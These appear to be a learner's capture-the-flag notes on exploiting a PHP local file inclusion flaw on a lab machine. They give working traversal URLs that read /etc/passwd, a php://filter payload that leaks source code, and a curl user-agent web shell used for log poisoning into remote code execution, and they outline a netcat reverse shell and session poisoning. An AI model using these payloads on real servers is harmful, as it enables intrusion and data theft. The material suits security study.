[Web Exploitation] Trying to hack a server through LFI vulnerability

<aside> 💡 LFI - attack against PHP servers, PHP does the processing on the server side & not visible to client side.

</aside>

<aside> 💡 The “?” in the URL indicates that PHP is being used in backend. For the machine IP we have ‘err’ parameter after the question mark meaning we can use ‘err’ as an entry point into the application.

</aside>

<aside> 💡 “include, require, include_once, require_once” functions in PHP causes LFI vulnerability.

</aside>

use OWASP ZAP for better understanding the request and response for this machine IP

<aside> 💡 Can test for LFI through directory traversal.

a) going into the root folder using “../../../../../../../../../” (doesnt matter how many dots and backslashes, it will reach root folder after 3-4 back traversing)

b) looking for passwd file, and seeing the contents of user and enviroment variables using ”/etc/passwd”

</aside>

<machine IP>/index.php?err=../../../../../../etc/passwd

<aside> 💡 Reading PHP server code from client side -

can do this using php filter wrapper and show the code in encoded format

</aside>

<machine IP>/index.php?err=php://filter/convert.base64-encode/resource=index.php

decode the string in base64 and you have the source code

<aside> 💡 Using LFI to do log poisoning and pivoting it into RCE -

• since we have LFI and we can show contents onto the page, we could theoretically use curl command to send the HTTP requests that a browser does but from command line where we can customize different things like parameters.

• After logging in we can see the logs file and the schema on how its recorded. Using the curl command we can specify our user agent to whatever we want. And the logs will show us that.

  curl -A “lmao-test user agent” <machine IP>/index.php
  

Opening the logs page on a private window and if the logs show us the user agent what we specified we have our proof of concept for log poisoning.

<aside> 💡 Creating a backdoor from log poisoning for RCE:

• inserting arbitrary PHP code to include in the logs, for example

curl -A "<?php echo 'lmao ';system(\\$GET['cmd']);?>" <machine ip>[/index.php](<http://10.10.129.165/index.php>)

• traversing down to the logs page

<machine ip>[/index.php?err=../../../../../../../../var/www/html/includes/logs/app_access.log](<http://10.10.129.165/index.php?err=../../../../../../../../var/www/html/includes/logs/app_access.log>)

• php cant execute so we use cmd that we passed from curl in the URL,

<machine ip>/index.php?err=../../../../../../../../var/www/html/includes/logs/app_access.log&cmd=<command>

we have our proof of concept for RCE

EXTRA STUFF

<aside> 💡 Getting a reverse shell after RCE

• opening up a netcat listener on port 4444
• traversing up and down and testing commands to see the file structure of the server

&cmd=which python

• plugging in a basic python reverse shell payload in the parameter (after inserting the machine ip address on which netcat is running and the port 4444)

&cmd=<python payload>

• netcat listener should have opened up some kind of shell after some time now </aside>

</aside>

</aside>

<aside> 💡 LFI to RCE via PHP session poisoning :- (not logged in)

• Grabbing a session value from cookies.
• Traversing down to the path where session cookies are stored and passing the value we just grabbed [with a prefix "sess_” in this case]

<machine ip>[/index.php?err=../../../../../../tmp/sess_](<http://10.10.129.165/index.php?err=../../../../../../tmp/sess_>)<session value>

• Another tab, Login page and pass some PHP code in username field and some random value in password
• Refresh the tab where we pass the session value in URL and the PHP code will be executed on the page </aside>

Questions

1,2,3 are easy and solvable if above notes are understood. 4th could be solved by looking into the source code we got from 3rd question. The location of the creds file and solved using the same method as 3rd. 5th one could be solved after logging in from 4th question. 6th question could be done using log poisoning and passing phpinfo()